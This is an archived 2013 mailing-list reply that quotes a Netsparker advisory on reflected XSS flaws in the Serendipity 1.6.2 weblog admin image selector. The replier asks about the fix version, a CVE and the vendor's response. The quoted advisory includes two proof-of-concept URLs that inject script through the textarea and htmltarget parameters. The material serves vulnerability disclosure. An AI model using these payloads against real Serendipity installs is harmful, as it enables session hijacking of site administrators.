lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20130719103356.GE4878@kludge.henri.nerv.fi>
Date: Fri, 19 Jul 2013 13:33:56 +0300
From: Henri Salo <henri@...v.fi>
To: Netsparker Advisories <advisories@...itunasecurity.com>
Cc: security@....org, bugtraq@...urityfocus.com
Subject: Re: [Full-disclosure] XSS Vulnerabilities in Serendipity

On Fri, Jul 12, 2013 at 02:29:52PM +0300, Netsparker Advisories wrote:
> Information
> --------------------
> Name :  XSS Vulnerabilities in Serendipity
> Software :  Serendipity 1.6.2 and possibly below.
> Vendor Homepage :  http://www.s9y.org/
> Vulnerability Type :  Cross-Site Scripting
> Severity :  Medium
> Researcher :  Omar Kurt
> Advisory Reference :  NS-13-003
> 
> Description
> --------------------
> Serendipity is a PHP-powered weblog application which gives the user an
> easy way to maintain an online diary, weblog or even a complete homepage.
> While the default package is designed for the casual blogger, Serendipity
> offers a flexible, expandable and easy-to-use framework with the power for
> professional applications.
> 
> Details
> --------------------
> Serendipity is affected by XSS vulnerabilities in version 1.6.2.
> 
> http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
> http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117
> 
> You can read the full article about Cross-Site Scripting from here :
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> 
> Solution
> --------------------
> The vendor fixed this vulnerability in the new version. Please see the
> references.
> 
> Advisory Timeline
> --------------------
> 26/02/2013 - First contact
> 04/03/2013 - Sent the details
> 10/07/2013 - Advisory released
> 
> References
> --------------------
> Vendor Url / Patch : -
> MSL Advisory Link :
> https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/

So is this fixed in version 1.7? No vendor URL/path listed in your references.
Does this vulnerability have CVE identifier? What was vendor response?

---
Henri Salo

Download attachment "signature.asc" of type "application/pgp-signature" (199 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ